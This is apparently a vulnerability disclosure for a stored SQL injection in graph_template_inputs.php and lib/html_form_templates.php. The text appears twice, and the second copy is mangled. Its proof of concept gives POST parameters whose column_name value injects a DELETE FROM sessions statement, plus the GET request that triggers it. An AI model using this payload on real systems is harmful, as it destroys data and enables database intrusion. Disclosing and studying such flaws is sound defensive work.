Summary
Some of the data stored in form_save() function in graph_template_inputs.php is not thoroughly checked and is used to concatenate the SQL statement in draw_nontemplated_fields_graph_item() function from lib/html_form_templates.php , finally resulting in SQL injection.
Details
In the SQL table graph_template_input stored in database, the column_name field is controllable. The writing of dirty data can be done from form_save() function in graph_template_inputs.php.

Storage does not require administrator privileges, while reading data to realize attack require administrator privileges.
In addition, the field length limit is 50.

The attack starts with the graph_edit() function in graphs.php. Calling draw_nontemplated_fields_graph_item() function.

Finally arriving at lib/html_form_templates.php. when reading the field data of table graph_template_input in database, variable $item is not checked and concatenated directly, resulting in SQL injection.


PoC
POST access graph_template_inputs.php and submit the following data:
- '__csrf_magic'=> '',
- 'action'=>'save',
- 'save_component_input'=>1,
- 'graph_template_input_id'=>1,
- 'graph_template_id'=>1,
- 'name'=>'FORSQLinjection',
- 'description'=>'FORSQLinjection',
- 'column_name'=>'id FROM host AS gti;DELETE FROM sessions WHERE 1;#'
check field in automation_match_rule_items table.

GET access : "http://ip:port/graphs.php?action=graph_edit&id=1".
Table session will delete data with id = 1.
Researcher: ISHGARD-2, USTC
Summary
Some of the data stored in
form_save()function ingraph_template_inputs.phpis not thoroughly checked and is used to concatenate the SQL statement indraw_nontemplated_fields_graph_item()function fromlib/html_form_templates.php, finally resulting in SQL injection.Details
In the SQL table graph_template_input stored in database, the column_name field is controllable. The writing of dirty data can be done from

form_save()function ingraph_template_inputs.php.Storage does not require administrator privileges, while reading data to realize attack require administrator privileges.

In addition, the field length limit is 50.
The attack starts with the

graph_edit()function ingraphs.php.Callingdraw_nontemplated_fields_graph_item()function.Finally arriving at lib/html_form_templates.php. when reading the field data of table graph_template_input in database, variable $item is not checked and concatenated directly, resulting in SQL injection.


PoC
POST access
graph_template_inputs.phpand submit the following data:check field in automation_match_rule_items table.
GET access : "http://ip:port/graphs.php?action=graph_edit&id=1".
Table session will delete data with id = 1.
Researcher: ISHGARD-2, USTC